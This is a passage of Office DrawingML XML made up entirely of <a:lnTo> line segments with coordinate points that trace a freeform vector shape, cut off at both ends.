                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14210" y="2555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14405" y="2750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14332" y="2871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14308" y="3017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14308" y="3066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14332" y="3090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14405" y="3139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14478" y="3139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14551" y="3090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14624" y="2993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14867" y="3285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14770" y="3358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14697" y="3431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14600" y="3601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14575" y="3674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14575" y="3723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14575" y="3772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14600" y="3796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14648" y="3796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14721" y="3772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14867" y="3699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15086" y="3601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15208" y="3820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15305" y="4064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15111" y="4137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15013" y="4185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14916" y="4234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14892" y="4307"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14892" y="4380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14940" y="4429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15013" y="4453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15135" y="4453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15232" y="4429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15427" y="4380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15573" y="4915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15403" y="4964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15232" y="5061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15086" y="5183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15038" y="5256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15013" y="5329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15013" y="5378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15038" y="5402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15062" y="5426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15111" y="5451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15208" y="5451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15305" y="5426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15476" y="5353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15695" y="5305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15792" y="5743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15622" y="5816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15451" y="5864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15305" y="5937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15159" y="6035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15013" y="6132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15013" y="6181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15013" y="6205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15038" y="6229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15403" y="6229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15719" y="6181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15914" y="6156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16035" y="6594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15768" y="6691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15549" y="6764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15184" y="6910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15135" y="6935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15062" y="6983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15038" y="7032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15013" y="7081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15038" y="7056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15013" y="7105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15013" y="7129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15038" y="7154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15086" y="7202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15208" y="7227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15403" y="7227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15622" y="7178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15841" y="7129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16108" y="7056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16108" y="7397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16108" y="7713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16035" y="7713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15670" y="7762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15330" y="7786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14965" y="7835"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14600" y="7932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14575" y="7957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14575" y="7981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14575" y="8005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14600" y="8030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15330" y="8151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15500" y="8176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15695" y="8200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15865" y="8176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16035" y="8127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16035" y="8176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15938" y="8565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15816" y="8930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15524" y="8881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15232" y="8833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15013" y="8784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14794" y="8760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14332" y="8784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14308" y="8784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14308" y="8808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14308" y="8833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14332" y="8833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14478" y="8881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14624" y="8954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14965" y="9125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15281" y="9271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15451" y="9319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15622" y="9368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15500" y="9636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15354" y="9903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15135" y="9782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14916" y="9684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14429" y="9563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14210" y="9490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13943" y="9441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13699" y="9417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13553" y="9417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13456" y="9465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13432" y="9490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13432" y="9514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13578" y="9636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13772" y="9733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14137" y="9855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14648" y="10049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14892" y="10147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15135" y="10244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14794" y="10706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14721" y="10658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14624" y="10633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14405" y="10560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13991" y="10512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13772" y="10439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13505" y="10366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13359" y="10341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13213" y="10317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13115" y="10341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12994" y="10390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12994" y="10414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13018" y="10536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13091" y="10609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13188" y="10682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13310" y="10731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13553" y="10828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13772" y="10877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14113" y="10998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14308" y="11047"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14502" y="11071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14089" y="11509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13943" y="11412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13772" y="11339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13432" y="11242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13067" y="11144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12702" y="11071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12337" y="11047"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11972" y="11096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11947" y="11096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11899" y="11120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11874" y="11193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11850" y="11266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11874" y="11290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11899" y="11363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11972" y="11412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12580" y="11509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12872" y="11582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13164" y="11655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13432" y="11753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13675" y="11850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13359" y="12118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13018" y="12337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12994" y="12288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12945" y="12239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12775" y="12166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12604" y="12142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12410" y="12118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12215" y="12069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11850" y="11947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11558" y="11826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11242" y="11704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11096" y="11655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10950" y="11607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10779" y="11582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10633" y="11582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10609" y="11607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10609" y="11655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10682" y="11753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10804" y="11874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10925" y="11947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11047" y="12045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11315" y="12166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11582" y="12288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11826" y="12385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12093" y="12483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12361" y="12556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12507" y="12580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12629" y="12580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12239" y="12799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11850" y="12969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11801" y="12921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11680" y="12823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11558" y="12775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11266" y="12677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10998" y="12604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10731" y="12531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10585" y="12458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10439" y="12385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10171" y="12239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10025" y="12166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9879" y="12118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9733" y="12093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9563" y="12093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9514" y="12118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9490" y="12142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9490" y="12191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9514" y="12215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9733" y="12410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9952" y="12580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10220" y="12750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10463" y="12872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10682" y="12969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10901" y="13042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11363" y="13188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10852" y="13359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10317" y="13505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10317" y="13480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10366" y="13359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10366" y="13310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10342" y="13261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10293" y="13213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10244" y="13164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9198" y="12604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9028" y="12507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8809" y="12410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8711" y="12385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8590" y="12361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8492" y="12385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8419" y="12434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8419" y="12458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8444" y="12556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8517" y="12629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8687" y="12799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9028" y="13042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9490" y="13334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9733" y="13456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10001" y="13553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9539" y="13651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9076" y="13699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9052" y="13651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8857" y="13480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8638" y="13334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8176" y="13067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7762" y="12799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7568" y="12677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7349" y="12604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7300" y="12604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7276" y="12653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7276" y="12775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7300" y="12872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7373" y="12969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7446" y="13042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7616" y="13213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7787" y="13334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8103" y="13553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8444" y="13748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8346" y="13748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7835" y="13772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7349" y="13724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7373" y="13699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7397" y="13651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7422" y="13578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7397" y="13529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7373" y="13456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7324" y="13383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7203" y="13286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6911" y="13091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6643" y="12872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6521" y="12799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6448" y="12750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6424" y="12702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6424" y="12677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6400" y="12677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6375" y="12702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6351" y="12775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6327" y="12823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6351" y="12969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6400" y="13042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6448" y="13140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6570" y="13286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6716" y="13432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6862" y="13553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7032" y="13675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7032" y="13675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6619" y="13578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6229" y="13456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5864" y="13334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5670" y="13286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5475" y="13261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5280" y="13237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5086" y="13261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4988" y="13286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4915" y="13334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4842" y="13407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4818" y="13505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4672" y="13651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4502" y="13797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4331" y="13943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4161" y="14064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3869" y="14259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3553" y="14405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3212" y="14551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2896" y="14648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2555" y="14745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2190" y="14818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1825" y="14867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1485" y="14891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1314" y="14891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1144" y="14867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1436" y="14672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1728" y="14453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1996" y="14210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2239" y="13991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2604" y="13626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2774" y="13432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2944" y="13188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3066" y="12945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3163" y="12702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3212" y="12458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3212" y="12337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3212" y="12215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3236" y="12118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3212" y="12045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3188" y="11972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3115" y="11923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2920" y="11826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2750" y="11704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2409" y="11461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2117" y="11169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1850" y="10852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1631" y="10512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1412" y="10147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1241" y="9757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1095" y="9368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="949" y="8979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="828" y="8565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="755" y="8127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="682" y="7689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="657" y="7251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="657" y="6837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="706" y="6399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="803" y="5986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="925" y="5548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1120" y="5110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1339" y="4696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1606" y="4307"/>
                  </a:lnTo>
